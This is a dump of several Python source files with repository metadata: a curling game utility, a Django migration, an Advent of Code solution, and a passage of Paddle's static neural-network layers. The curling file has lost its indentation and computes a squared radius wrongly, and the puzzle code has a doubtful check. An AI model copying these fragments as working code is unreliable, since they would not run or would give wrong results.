refs/heads/master
| 2021-01-13T09:44:59.200368
| 2017-05-10T08:34:47
| 2017-05-10T08:34:47
| 70,134,358
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,893
|
py
|
# -*- coding: utf-8 -*-
# dc.py
# Katsuki Ohto
import math
import numpy as np
# constant
BLACK = 1
WHITE = 0
N_ENDS = 10
END_LAST = 0
N_TURNS = 16
TURN_LAST = 0
def to_turn_color(t):
return t % 2
N_COLOR_STONES = 8
N_STONES = N_COLOR_STONES * 2
SCORE_MIN = -N_COLOR_STONES
SCORE_MAX = +N_COLOR_STONES
SCORE_LENGTH = SCORE_MAX - SCORE_MIN + 1
def StoIDX(s):
return s - SCORE_MIN
STONE_RADIUS = 0.145
HOUSE_RADIUS = 1.83
X_TEE = 0
Y_TEE = 0
PLAYAREA_WIDTH = 4.75
PLAYAREA_LENGTH = 8.23
X_PLAYAREA_MIN = X_TEE - PLAYAREA_WIDTH / 2
X_PLAYAREA_MAX = X_TEE + PLAYAREA_WIDTH / 2
Y_PLAYAREA_MIN = Y_TEE + HOUSE_RADIUS - PLAYAREA_LENGTH
Y_PLAYAREA_MAX = Y_TEE + HOUSE_RADIUS
X_THROW = X_TEE
Y_THROW = Y_PLAYAREA_MIN - 30.0
R_IN_HOUSE = HOUSE_RADIUS + STONE_RADIUS
R2_IN_HOUSE = R_IN_HOUSE * 2
XY_TEE = (X_TEE, Y_TEE)
XY_THROW = (X_THROW, Y_THROW)
VX_TEE_SHOT_R = -0.99073974
VY_TEE_SHOT = +29.559775
RIGHT = 0
LEFT = 1
TEE_SHOT_R = (VX_TEE_SHOT_R, VY_TEE_SHOT, RIGHT)
ERROR_SIGMA = 0.145
ERROR_SCALE_X = 0.5 # gat version
ERROR_SCALE_Y = 2.0 # gat version
VX_ERROR_SIGMA = 0.117659 * ERROR_SCALE_X
VY_ERROR_SIGMA = 0.0590006 * ERROR_SCALE_Y
def official_to_ayumu_turn(t):
return N_TURNS - 1 - t
def official_to_ayumu_position(p):
return (p[0] - X_TEE, 4.83 - p[1])
def ayumu_to_official_move(mv):
return (mv[0], -mv[1], mv[2])
def is_in_house_r(r):
return bool(r < R_IN_HOUSE)
def is_in_house_r2(r2):
return bool(r2 < R2_IN_HOUSE)
def is_in_house_xy(x, y):
dx = x - X_TEE
dy = y - Y_TEE
return is_in_house_r2(dx * dx + dy * dy)
def is_in_play_area_xy(x, y):
return bool((X_PLAYAREA_MIN < x) and (x < X_PLAYAREA_MAX) and (Y_PLAYAREA_MIN < y) and (y < Y_PLAYAREA_MAX))
def is_in_play_area(pos):
return is_in_play_area_xy(pos[0], pos[1])
def calc_r2(a, b):
return (b[0] - a[0]) ** 2 + (b[1] - a[1]) ** 2
def calc_r(a, b):
return np.hypot(b[0] - a[0], b[1] - a[1])
def calc_th(a, b):
return np.arctan2(b[1] - a[1], b[0] - a[0])
class Board:
def __init__(self):
        self.init()
def init(self):
self.end = END_LAST
self.turn = TURN_LAST
self.rscore = 0
self.stone = np.empty(N_STONES, dtype = tuple)
def locate_in_throw_point(self):
for i in range(N_STONES):
self.stone[i] = XY_THROW
def count_score_a(sa): # count stone score by array
bmin2 = R2_IN_HOUSE
wmin2 = R2_IN_HOUSE
for i in range(BLACK, N_STONES, 2):
st = sa[i]
if is_in_play_area(st):
r2 = calc_r2(st, XY_TEE)
bmin2 = min(bmin2, r2)
for i in range(WHITE, N_STONES, 2):
st = sa[i]
if is_in_play_area(st):
r2 = calc_r2(st, XY_TEE)
wmin2 = min(wmin2, r2)
cnt = 0
if bmin2 > wmin2:
for i in range(WHITE, N_STONES, 2):
st = sa[i]
if is_in_play_area(st):
r2 = calc_r2(st, XY_TEE)
if r2 < bmin2:
cnt -= 1
elif bmin2 < wmin2:
for i in range(BLACK, N_STONES, 2):
st = sa[i]
if is_in_play_area(st):
r2 = calc_r2(st, XY_TEE)
if r2 < wmin2:
cnt += 1
return cnt
def count_score(bd): # count stone score on board
return count_score_a(bd.stone)
def is_caving_in_pp(p0, p1):
return (calc_r2(p0, p1) < ((2 * STONE_RADIUS) ** 2))
def is_caving_in_bp(bd, p):
for i in range(N_STONES):
if is_caving_in_pp(bd.stone[i], p):
return True
return False
def locate_in_play_area_p():
return (X_PLAYAREA_MIN + np.random.rand() * PLAYAREA_WIDTH,
Y_PLAYAREA_MIN + np.random.rand() * PLAYAREA_LENGTH)
def locate_in_house_p():
r = np.random.rand() * R_IN_HOUSE
th = np.random.rand() * 2 * math.pi
return (X_TEE + r * math.sin(th), Y_TEE + r * math.cos(th))
def locate_in_play_area_b(nb, nw):
bd = Board()
bd.locate_in_throw_point()
for i in range(nb): # black
while True:
pos = locate_in_play_area_p()
if not is_caving_in_bp(bd, pos): # ok
bd.stone[N_STONES - 1 - 2 * i] = pos
break
for i in range(nw): # white
while True:
pos = locate_in_play_area_p()
if not is_caving_in_bp(bd, pos): # ok
bd.stone[N_STONES - 2 - 2 * i] = pos
break
return bd
"""SHOTLOG_NORMAL_VARIABLE =(
('player', type(string)),
('opp_player', string),
('draw_game', int),
('random', float),
('end', int),
('turn', int),
('rel_score', int),
('score', int),
('rest_time', int),
('used_time', int))"""
SHOTLOG_NORMAL_VARIABLE =(
'player',
'opp_player',
'draw_game',
'random',
'end',
'turn',
'rscore',
'escore',
'rest_time',
'used_time')
def shotlog_to_string(sl):
lst = []
for var in SHOTLOG_NORMAL_VARIABLE:
lst.append(str(sl[var]))
cmv = sl['chosen_move']
rmv = sl['run_move']
for v in cmv:
lst.append(str(v))
for v in rmv:
lst.append(str(v))
prvs = sl['previous_stone']
afts = sl['after_stone']
for s in prvs:
for v in s:
lst.append(str(v))
for s in afts:
for v in s:
lst.append(str(v))
    return ' '.join(lst)
def string_to_shot_log(line):
    v = line.split(' ')
sl = {}
sl['player'] = v[0]
sl['opp_player'] = v[1]
sl['draw_game'] = int(v[2])
sl['random'] = float(v[3])
sl['end'] = int(v[4])
sl['turn'] = int(v[5])
sl['rscore'] = int(v[6])
sl['escore'] = int(v[7])
sl['rest_time'] = int(v[8])
sl['used_time'] = int(v[9])
sl['chosen_move'] = (float(v[10]), float(v[11]), int(v[12]))
sl['run_move'] = (float(v[13]), float(v[14]), int(v[15]))
p = np.empty(N_STONES, dtype = tuple)
a = np.empty(N_STONES, dtype = tuple)
for i in range(0, N_TURNS):
index = 16 + i * 2
x = float(v[index])
y = float(v[index + 1])
p[i] = (x, y)
for i in range(0, N_TURNS):
index = 16 + N_TURNS * 2 + i * 2
x = float(v[index])
y = float(v[index + 1])
a[i] = (x, y)
sl['previous_stone'] = p
sl['after_stone'] = a
return sl
def load_shot_log(file_path):
    # read the log file, one shot record per line
    logs = []
    with open(file_path) as f:
        for line in f:
            line = line.rstrip()
            #print(line)
            sl = string_to_shot_log(line)
            logs.append(sl)
            #print shotlog_to_string(sl)
    return logs
def shot_log_to_board(sl):
bd = Board()
bd.end = sl['end']
bd.turn = sl['turn']
    bd.rscore = sl['rscore']  # Board.init() defines rscore, so keep the attribute name consistent
ps = sl['previous_stone']
for i in range(0, N_STONES):
bd.stone[i] = ps[N_STONES - 1 - i]
return bd
#IMAGE_WIDTH = 28
#IMAGE_LENGTH = 28
#IMAGE_PLAINS = 1
IMAGE_WIDTH = 27
IMAGE_LENGTH = 51
IMAGE_PLAINS = 5
IMAGE_SIZE = IMAGE_WIDTH * IMAGE_LENGTH
STEP_W_TO_X = PLAYAREA_WIDTH / (IMAGE_WIDTH - 1)
STEP_W_TO_Y = PLAYAREA_LENGTH / (IMAGE_LENGTH - 1)
def WtoX(w):
return X_PLAYAREA_MIN + w * STEP_W_TO_X
def LtoY(l):
return Y_PLAYAREA_MIN + l * STEP_W_TO_Y
NORM_SIGMA = STONE_RADIUS / 2
def norm(m, o):
return math.exp(-(((o[0] - m[0]) ** 2) + ((o[1] - m[1]) ** 2)) / (2 * (NORM_SIGMA ** 2))) / (math.sqrt(2 * math.pi) * NORM_SIGMA)
def board_to_image(bd):
img = np.zeros((IMAGE_WIDTH, IMAGE_LENGTH, IMAGE_PLAINS), dtype = float)
for w in range(IMAGE_WIDTH):
for l in range(IMAGE_LENGTH):
for p in range(IMAGE_PLAINS):
v = 0.0
m = (WtoX(w), LtoY(l))
# white
for i in range(WHITE, N_STONES, 2):
o = bd.stone[i]
if is_in_play_area(o):
v -= norm(m, o)
# black
for i in range(BLACK, N_STONES, 2):
o = bd.stone[i]
if is_in_play_area(o):
v += norm(m, o)
img[w][l][p] = v
return img
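# --- Hedged usage sketch, not part of the original file: place a few random
# --- stones in the play area, score the position and rasterise it into the
# --- image tensor defined above.
if __name__ == '__main__':
    np.random.seed(0)
    bd = locate_in_play_area_b(3, 3)  # 3 black and 3 white stones
    print("stone score:", count_score(bd))
    img = board_to_image(bd)
    print("image shape:", img.shape)  # (IMAGE_WIDTH, IMAGE_LENGTH, IMAGE_PLAINS)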
|
[
"a.a.b.a.b.c.a.b.c.d.abcd1234@gmail.com"
] |
a.a.b.a.b.c.a.b.c.d.abcd1234@gmail.com
|
c5fdfda86e2d27b77113ba406c7a91ed91ea85d5
|
bfa12b1960addbf4c026ae2f1e65c185363ba21e
|
/resident/migrations/0005_auto_20190417_0238.py
|
bd8d0f6f0a0c916e2a0f90ec3a98923e99a8c567
|
[
"MIT"
] |
permissive
|
vitorh45/residential
|
387aedc1f030caf210d3e2f41f0c60fae3000cb4
|
d36b29a72b9d1d79efab7e8549aec39eacce10d7
|
refs/heads/master
| 2022-12-08T13:57:00.579798
| 2019-06-07T04:20:13
| 2019-06-07T04:20:13
| 178,983,759
| 0
| 0
|
MIT
| 2022-11-22T03:51:05
| 2019-04-02T02:32:12
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 744
|
py
|
# Generated by Django 2.2 on 2019-04-17 02:38
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('resident', '0004_auto_20190414_0518'),
]
operations = [
migrations.RemoveField(
model_name='resident',
name='lot',
),
migrations.AddField(
model_name='resident',
name='log_number',
            field=models.IntegerField(blank=True, null=True, verbose_name='Lot numbers'),
),
migrations.AddField(
model_name='resident',
name='lot_block',
            field=models.CharField(blank=True, max_length=20, null=True, verbose_name='Lot block'),
),
]
|
[
"vitorh45@gmail.com"
] |
vitorh45@gmail.com
|
a004b9cdc6536c22f94e37b236230d27699337ff
|
266599ee7c19e7e38fce660010ec9e443e418d3b
|
/day15/day15.py
|
5c5916cfb3d9018c631566d2b0ef3ab674cbaf2d
|
[] |
no_license
|
Lisafiluz/Advent_of_code_2020
|
07c02d318903d1572fb4700278b154b67867e55c
|
cc86af482e0f50200a037b262c5225364633ab94
|
refs/heads/main
| 2023-02-06T17:36:27.151685
| 2020-12-18T10:26:44
| 2020-12-18T10:26:44
| 319,744,427
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,580
|
py
|
def get_file_data(path):
with open(path, 'r') as file_handler:
lines = file_handler.readlines()
lines_without_spaces = [line.strip() for line in lines]
return lines_without_spaces
def get_final_number(first_inp, turns):
game = {}
# Start of the game
inp = first_inp.split(',')
j = 1
for number in inp:
game[int(number)] = [j]
j += 1
# Starting play
current_number = int(inp[-1])
for i in range(len(inp) + 1, turns + 1):
if len(game[current_number]) == 1:
current_number = 0
if current_number in game:
if len(game[0]) == 1:
game[current_number].append(i)
else:
game[current_number][0] = game[current_number][1]
game[current_number][1] = i
else:
game[current_number] = [i]
else:
current_number = game[current_number][1] - game[current_number][0]
if current_number in game:
if len(game[current_number]) == 1:
game[current_number].append(i)
else:
game[current_number][0] = game[current_number][1]
game[current_number][1] = i
else:
game[current_number] = [i]
return current_number
if __name__ == "__main__":
path = "day15/input.txt"
file_data = get_file_data(path)
# part 1
print(get_final_number(file_data[0], 2020))
# part 2
print(get_final_number(file_data[0], 30000000))
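    # --- Hedged self-check, not part of the original solution: the puzzle's
    # --- published example "0,3,6" yields 436 after 2020 turns, which gives a
    # --- quick sanity check of get_final_number.
    assert get_final_number("0,3,6", 2020) == 436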
|
[
"liluz@ebay.com"
] |
liluz@ebay.com
|
3f6698f81463d89c8041d67f7e261bbe1a62c573
|
5b59318f8a4908e9ca39665f9171dddc635f4b06
|
/python/paddle/static/nn/common.py
|
687e4545e305ba7dce97593f76430833e102b4fb
|
[
"Apache-2.0"
] |
permissive
|
chenwhql/Paddle
|
e85a6f9013e40601c11c214a323cf0d010283cd2
|
12473236a71e3b5c40a5b41f35fce5a115231a82
|
refs/heads/develop
| 2023-08-22T23:31:53.165184
| 2022-12-15T09:21:01
| 2022-12-15T09:21:01
| 137,726,910
| 0
| 2
|
Apache-2.0
| 2022-10-21T09:57:33
| 2018-06-18T08:24:29
|
C++
|
UTF-8
|
Python
| false
| false
| 123,422
|
py
|
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import inspect
import numpy as np
import paddle
from paddle.common_ops_import import (
LayerHelper,
check_type,
check_variable_and_dtype,
utils,
)
from paddle.fluid import core
from paddle.fluid.data_feeder import check_dtype
from paddle.fluid.framework import Variable, _non_static_mode, static_only
from paddle.fluid.initializer import Constant, Normal
from paddle.fluid.layers.layer_function_generator import templatedoc
from paddle.fluid.param_attr import ParamAttr
__all__ = []
@static_only
def fc(
x,
size,
num_flatten_dims=1,
weight_attr=None,
bias_attr=None,
activation=None,
name=None,
):
r"""
Fully-Connected layer can take a tensor or a list of tensor as its inputs.
It creates a 2-D weight tensor for each input tensor, which represents its
weight matrix from each input unit to each output unit. The fully connected
layer multiplies each input tensor with its corresponding weight to produce
an output tensor with shape :math:`[batch\_size, *, size]` , where :math:`*`
means any number of additional dimensions. If a list of tensor is given,
the results of multiple output tensors with shape :math:`[batch\_size, *, size]`
will be summed up. If :attr:`bias_attr` is not False, a 1-D bias tensor will
be created and added to the output. Finally, if :attr:`activation` is not None,
it will be applied to the output as well.
For a single input tensor :math:`X` , the equation is:
.. math::
Out = Act({XW + b})
For a list of input tensor, the equation is:
.. math::
Out = Act({\sum_{i=0}^{N-1}X_iW_i + b})
where:
* :math:`N`: The number of the input tensors. :math:`N` equals to :math:`len(X)` if :math:`X` is list of tensor.
* :math:`X_i`: The i-th input tensor.
* :math:`W_i`: The i-th weight matrix corresponding i-th input tensor.
* :math:`b`: The bias created by this layer (if needed).
* :math:`Act`: The activation function.
* :math:`Out`: The output tensor.
.. code-block:: text
# Case 1, input is a single tensor:
x.data = [[[0.1, 0.2],
[0.3, 0.4]]]
x.shape = (1, 2, 2) # 1 is batch_size
out = paddle.static.nn.fc(x=x, size=1, num_flatten_dims=2)
# Get the output:
out.data = [[0.83234344], [0.34936576]]
out.shape = (1, 2, 1)
# Case 2, input is a list of tensor:
x0.data = [[[0.1, 0.2],
[0.3, 0.4]]]
x0.shape = (1, 2, 2) # 1 is batch_size
x1.data = [[[0.1, 0.2, 0.3]]]
x1.shape = (1, 1, 3)
out = paddle.static.nn.fc(x=[x0, x1], size=2)
# Get the output:
out.data = [[0.18669507, 0.1893476]]
out.shape = (1, 2)
Args:
x (Tensor|list[Tensor]|tuple[Tensor]): A tensor or a list/tuple of tensors. The number of dimensions
of each tensor is at least 2. The data type should be float16, float32 or float64.
size (int): The number of output units in this layer, which also means the feature
size of output tensor.
num_flatten_dims (int, optional): The fc layer can accept an input tensor with more than
two dimensions. If this happens, the multi-dimensional tensor will first be flattened
into a 2-D matrix. The parameter :attr:`num_flatten_dims` determines how the input
tensor is flattened: the first :math:`num\_flatten\_dims` (inclusive, index starts from 1)
dimensions will be flatten to form the first dimension of the final matrix (height of
the matrix), and the rest :math:`rank(x) - num\_flatten\_dims` dimensions are
flattened to form the second dimension of the final matrix (width of the matrix).
For example, assuming that :attr:`x` is a 5-dimensional tensor with a shape
:math:`[2, 3, 4, 5, 6]` , and :attr:`num_flatten_dims` = 3.
Then, the flattened matrix will have a shape :math:`[2 * 3 * 4, 5 * 6] = [24, 30]` .
Default: 1.
weight_attr (ParamAttr, optional): The attribute for the learnable weight.
The default value is None, and the weight will be initialized to zero.
For detailed information, please refer to :attr:`paddle.ParamAttr`.
Warning, if x is a list of tensor, weight_attr should also be a list of same length.
bias_attr (ParamAttr|bool, optional): The attribute of the learnable bias.
If it is set to False, no bias will be added to the output.
If it is set to None or one kind of ParamAttr, a bias parameter will
be created according to ParamAttr. For detailed information, please refer
to :attr:`paddle.ParamAttr`. The default value is None and the bias will be
initialized to zero.
activation (str, optional): Activation to be applied to the output of
this layer, such as tanh, softmax, sigmoid, relu. For more information,
please refer to :ref:`api_guide_activations_en` . Default: None.
name (str, optional): The default value is None. Normally there is no need for user to set
it. For more information, please refer to :ref:`api_guide_Name` .
Returns:
Tensor, its shape is :math:`[batch\_size, *, size]` , and the data type is same with input.
Examples:
.. code-block:: python
import paddle
paddle.enable_static()
# When input is a single tensor
x = paddle.static.data(name="x", shape=[1, 2, 2], dtype="float32")
# x: [[[0.1 0.2]
# [0.3 0.4]]]
out = paddle.static.nn.fc(
x=x,
size=1,
num_flatten_dims=2,
weight_attr=paddle.ParamAttr(initializer=paddle.nn.initializer.Constant(value=0.5)),
bias_attr=paddle.ParamAttr(initializer=paddle.nn.initializer.Constant(value=1.0)))
# out: [[[1.15]
# [1.35]]]
# When input is multiple tensors
x0 = paddle.static.data(name="x0", shape=[1, 2, 2], dtype="float32")
# x0: [[[0.1 0.2]
# [0.3 0.4]]]
x1 = paddle.static.data(name="x1", shape=[1, 1, 3], dtype="float32")
# x1: [[[0.1 0.2 0.3]]]
out = paddle.static.nn.fc(
x=[x0, x1],
size=2,
weight_attr=paddle.ParamAttr(initializer=paddle.nn.initializer.Constant(value=0.5)),
bias_attr=paddle.ParamAttr(initializer=paddle.nn.initializer.Constant(value=1.0)))
# out: [[1.8 1.8]]
"""
return paddle.fluid.layers.fc(
input=x,
size=size,
num_flatten_dims=num_flatten_dims,
param_attr=weight_attr,
bias_attr=bias_attr,
act=activation,
name=name,
)
def instance_norm(
input, epsilon=1e-05, param_attr=None, bias_attr=None, name=None
):
r"""
:api_attr: Static Graph
**Instance Normalization Layer**
Can be used as a normalizer function for convolution or fully_connected operations.
The required data format for this layer is one of the following:
DataLayout: NCHW `[batch, in_channels, in_height, in_width]`
Refer to `Instance Normalization: The Missing Ingredient for
Fast Stylization <https://arxiv.org/pdf/1607.08022.pdf>`_
for more details.
:math:`input` is the input features over a mini-batch.
.. math::
\mu_{\beta} &\gets \frac{1}{HW} \sum_{i=1}^{HW} x_i \qquad &//
\ mean\ of\ one\ feature\ map\ in\ mini-batch \\
\sigma_{\beta}^{2} &\gets \frac{1}{HW} \sum_{i=1}^{HW}(x_i -
\mu_{\beta})^2 \qquad &//\ variance\ of\ one\ feature\ map\ in\ mini-batch \\
\hat{x_i} &\gets \frac{x_i - \mu_\beta} {\sqrt{
\sigma_{\beta}^{2} + \epsilon}} \qquad &//\ normalize \\
y_i &\gets \gamma \hat{x_i} + \beta \qquad &//\ scale\ and\ shift
Note:
`H` means height of feature map, `W` means width of feature map.
Args:
input(Tensor): The rank of input tensor can be 2, 3, 4, 5.
The data type is float32 or float64.
epsilon(float, Default 1e-05): A value added to the denominator for
numerical stability. Default is 1e-5.
param_attr(ParamAttr|None|bool, optional): The parameter attribute for Parameter `scale`
of instance_norm. If it is set to None or one attribute of ParamAttr, instance_norm
will create ParamAttr as param_attr, the name of scale can be set in ParamAttr.
If the Initializer of the param_attr is not set, the parameter is initialized
with Xavier. If the param_attr is set to False, instance_norm will not create param_attr.
Default: None.
bias_attr(ParamAttr|None|bool, optional): The parameter attribute for the bias of instance_norm.
If it is set to None or one attribute of ParamAttr, instance_norm
will create ParamAttr as bias_attr, the name of bias can be set in ParamAttr.
If the Initializer of the bias_attr is not set, the bias is initialized zero.
If the bias_attr is set to False, instance_norm will not create bias_attr.
Default: None.
name(string, Default None): A name for this layer(optional). If set None, the layer
will be named automatically.
Returns:
A Tensor which is the result after applying instance normalization on the input,
has same shape and data type with input.
Examples:
.. code-block:: python
import paddle
paddle.enable_static()
x = paddle.static.data(name='x', shape=[3, 7, 3, 7], dtype='float32')
hidden1 = paddle.static.nn.fc(x, size=200)
hidden2 = paddle.static.nn.instance_norm(hidden1)
"""
check_variable_and_dtype(
input, 'input', ['float32', 'float64'], 'instance_norm'
)
if param_attr is False:
assert (
bias_attr is False
), "param_attr and bias_attr must be set to False at the same time in instance_norm"
helper = LayerHelper('instance_norm', **locals())
dtype = helper.input_dtype()
    # use fp32 for the instance_norm parameters
if dtype == paddle.framework.core.VarDesc.VarType.FP16:
dtype = paddle.framework.core.VarDesc.VarType.FP32
input_shape = input.shape
if len(input.shape) < 2 or len(input.shape) > 5:
raise ValueError(
'expected 2D or 3D or 4D or 5D input (got {}D input, input shape is: {})'.format(
len(input.shape), input_shape
)
)
channel_num = input_shape[1]
param_shape = [channel_num]
if param_attr and bias_attr:
# create parameter
scale = helper.create_parameter(
attr=helper.param_attr,
shape=param_shape,
dtype=dtype,
default_initializer=Constant(1.0),
)
bias = helper.create_parameter(
attr=helper.bias_attr,
shape=param_shape,
dtype=dtype,
is_bias=True,
default_initializer=Constant(0.0),
)
# create output
saved_mean = helper.create_variable_for_type_inference(
dtype=dtype, stop_gradient=True
)
saved_variance = helper.create_variable_for_type_inference(
dtype=dtype, stop_gradient=True
)
instance_norm_out = helper.create_variable_for_type_inference(dtype)
inputs = {"X": input}
if param_attr and bias_attr:
inputs["Scale"] = scale
inputs["Bias"] = bias
helper.append_op(
type="instance_norm",
inputs=inputs,
outputs={
"Y": instance_norm_out,
"SavedMean": saved_mean,
"SavedVariance": saved_variance,
},
attrs={
"epsilon": epsilon,
},
)
return instance_norm_out
@static_only
def continuous_value_model(input, cvm, use_cvm=True):
r"""
**continuous_value_model layers**
Now, this OP is used in CTR project to remove or dispose show and click value in :attr:`input`.
:attr:`input` is an embedding vector including show and click value, whose shape is :math:`[N, D]` (N is batch size. D is `2 + embedding dim` ).
Show and click at first two dims of embedding vector D.
If :attr:`use_cvm` is True, it will calculate :math:`log(show)` and :math:`log(click)` , and output shape is :math:`[N, D]` .
If :attr:`use_cvm` is False, it will remove show and click from :attr:`input` , and output shape is :math:`[N, D - 2]` .
:attr:`cvm` is show_click info, whose shape is :math:`[N, 2]` .
Args:
input (Variable): The input variable. A 2-D LoDTensor with shape :math:`[N, D]` , where N is the batch size, D is `2 + the embedding dim` . `lod level = 1` .
A Tensor with type float32, float64.
cvm (Variable): Show and click variable. A 2-D Tensor with shape :math:`[N, 2]` , where N is the batch size, 2 is show and click.
A Tensor with type float32, float64.
use_cvm (bool): Use show_click or not. if use, the output dim is the same as input.
if not use, the output dim is `input dim - 2` (remove show and click)
Returns:
Variable: A 2-D LodTensor with shape :math:`[N, M]` . if :attr:`use_cvm` = True, M is equal to input dim D. if False, M is equal to `D - 2`. \
A Tensor with same type as input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import paddle
input = paddle.static.data(name="input", shape=[64, 1], dtype="int64")
label = paddle.static.data(name="label", shape=[64, 1], dtype="int64")
w0 = paddle.full(shape=(100, 1), fill_value=2).astype(paddle.float32)
embed = paddle.nn.functional.embedding(
input,
w0)
ones = paddle.full_like(label, 1, dtype="int64")
show_clk = paddle.cast(paddle.concat([ones, label], axis=1), dtype='float32')
show_clk.stop_gradient = True
input_with_cvm = paddle.static.nn.continuous_value_model(embed, show_clk, True)
"""
helper = LayerHelper('cvm', **locals())
out = helper.create_variable(dtype=input.dtype)
check_variable_and_dtype(
input, 'input', ['float16', 'float32', 'float64'], 'cvm'
)
helper.append_op(
type='cvm',
inputs={'X': [input], 'CVM': [cvm]},
outputs={'Y': [out]},
attrs={"use_cvm": use_cvm},
)
return out
@static_only
def data_norm(
input,
act=None,
epsilon=1e-05,
param_attr=None,
data_layout='NCHW',
in_place=False,
name=None,
moving_mean_name=None,
moving_variance_name=None,
do_model_average_for_mean_and_var=True,
slot_dim=-1,
sync_stats=False,
summary_decay_rate=0.9999999,
enable_scale_and_shift=False,
):
r"""
:api_attr: Static Graph
**Data Normalization Layer**
This op can be used as a normalizer function for conv2d and fully_connected operations.
The required data format for this layer is one of the following:
1. NHWC `[batch, in_height, in_width, in_channels]`
2. NCHW `[batch, in_channels, in_height, in_width]`
:math:`input` is the input features over a mini-batch.
.. math::
\mu_{\beta} &\gets \frac{1}{m} \sum_{i=1}^{m} x_i \qquad &//
\ mini-batch\ mean \\
\sigma_{\beta}^{2} &\gets \frac{1}{m} \sum_{i=1}^{m}(x_i -
\mu_{\beta})^2 \qquad &//\ mini-batch\ variance \\
\hat{x_i} &\gets \frac{x_i - \mu_\beta} {\sqrt{
\sigma_{\beta}^{2} + \epsilon}} \qquad &//\ normalize \\
y_i &\gets \gamma \hat{x_i} + \beta \qquad &//\ scale\ and\ shift
Args:
input (Tensor): The input Tensor.
act (str, optional): Activation type, linear|relu|prelu|... Default: None.
epsilon(float, optional): Whether to add small values into the variance during calculations
to prevent division by zero. Default: 1e-05.
param_attr (ParamAttr, optional): The parameter attribute for Parameter `scale`. Default: None.
data_layout (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`. Default: `"NCHW"`.
in_place (bool, optional): Make the input and output of batch norm reuse memory. Default: False.
name (str, optional): A name for this layer (optional). If set None, the layer
will be named automatically. Default: None.
moving_mean_name (str, optional): The name of moving_mean which store the global Mean. Default: None.
moving_variance_name (str, optional): The name of the moving_variance which store the global Variance. Default: None.
do_model_average_for_mean_and_var (bool, optional): Whether parameter mean and variance
should do model average when model average is enabled. Default: True.
slot_dim (int, optional): The embedding dimension of one slot. Slot is a set of one specific feature. In pslib mode,
we distinguish feature ids by slot and pull their embeddings from parameter server (pslib). The first
            place of the embedding is the historical show number (occurrence time of this feature id with a label 0).
If the input of this op is concated by slot-wise embeddings, and the show number is zero when this slot
is new or empty, the normalization result may be impractical. To avoid this, we add slot_dim to locate
the show number and judge if the show number is zero. If so, we choose to skip normalization on this
embedding. Default: -1.
sync_stats (bool, optional): When running with multiple GPU cards, using allreduce to sync the
summary messages. Default: False.
summary_decay_rate (float, optional): The decay rate when updating summary. Default: 0.9999999.
enable_scale_and_shift (bool, optional): do scale&shift after normalization. Default: False.
Returns:
Tensor: A tensor which is the result after applying data normalization on the input.
Examples:
.. code-block:: python
import paddle
paddle.enable_static()
x = paddle.randn(shape=[32,100])
hidden2 = paddle.static.nn.data_norm(input=x)
"""
helper = LayerHelper('data_norm', **locals())
dtype = helper.input_dtype()
input_shape = input.shape
if data_layout == 'NCHW':
channel_num = input_shape[1]
else:
if data_layout == 'NHWC':
channel_num = input_shape[-1]
else:
raise ValueError("unsupported data layout:" + data_layout)
param_shape = [channel_num]
batch_size_default = 1e4
batch_sum_default = 0.0
batch_square_sum_default = 1e4
scale_w_default = 1.0
bias_default = 0.0
if param_attr and isinstance(param_attr, dict):
batch_size_default = param_attr.get("batch_size", 1e4)
batch_sum_default = param_attr.get("batch_sum", 0.0)
batch_square_sum_default = param_attr.get("batch_square", 1e4)
if enable_scale_and_shift:
scale_w_default = param_attr.get("scale_w", 1.0)
bias_default = param_attr.get("bias", 0.0)
# create scale and shift(bias) when enable_scale_and_shift is True
if name is None:
name = "dn"
if enable_scale_and_shift:
scale_w = helper.create_parameter(
attr=ParamAttr(
name=name + '.scale_w',
initializer=Constant(value=float(scale_w_default)),
trainable=True,
),
shape=param_shape,
dtype=input.dtype,
)
bias = helper.create_parameter(
attr=ParamAttr(
name=name + '.bias',
initializer=Constant(value=float(bias_default)),
trainable=True,
),
shape=param_shape,
dtype=input.dtype,
)
# create parameter
batch_size = helper.create_parameter(
attr=ParamAttr(
name=name + '.batch_size',
initializer=Constant(value=float(batch_size_default)),
trainable=True,
),
shape=param_shape,
dtype=input.dtype,
)
batch_sum = helper.create_parameter(
attr=ParamAttr(
name=name + '.batch_sum',
initializer=Constant(value=float(batch_sum_default)),
trainable=True,
),
shape=param_shape,
dtype=input.dtype,
)
batch_square_sum = helper.create_parameter(
attr=ParamAttr(
name=name + '.batch_square_sum',
initializer=Constant(value=float(batch_square_sum_default)),
trainable=True,
),
shape=param_shape,
dtype=input.dtype,
)
means = helper.create_variable(dtype=dtype, stop_gradient=True)
scales = helper.create_variable(dtype=dtype, stop_gradient=True)
data_norm_out = input if in_place else helper.create_variable(dtype=dtype)
inputs = {
"X": input,
"BatchSize": batch_size,
"BatchSum": batch_sum,
"BatchSquareSum": batch_square_sum,
}
attrs = {
"epsilon": epsilon,
"data_layout": data_layout,
"sync_stats": sync_stats,
"summary_decay_rate": summary_decay_rate,
}
if slot_dim > 0:
attrs["slot_dim"] = slot_dim
if enable_scale_and_shift:
attrs["enable_scale_and_shift"] = enable_scale_and_shift
if enable_scale_and_shift:
inputs["scale_w"] = scale_w
inputs["bias"] = bias
helper.append_op(
type="data_norm",
inputs=inputs,
outputs={
"Y": data_norm_out,
"Means": means,
"Scales": scales,
"BatchSize": batch_size,
"BatchSum": batch_sum,
"BatchSquareSum": batch_square_sum,
},
attrs=attrs,
)
return helper.append_activation(data_norm_out)
@templatedoc()
def group_norm(
input,
groups,
epsilon=1e-05,
param_attr=None,
bias_attr=None,
act=None,
data_layout='NCHW',
name=None,
):
"""
:api_attr: Static Graph
**Group Normalization Layer**
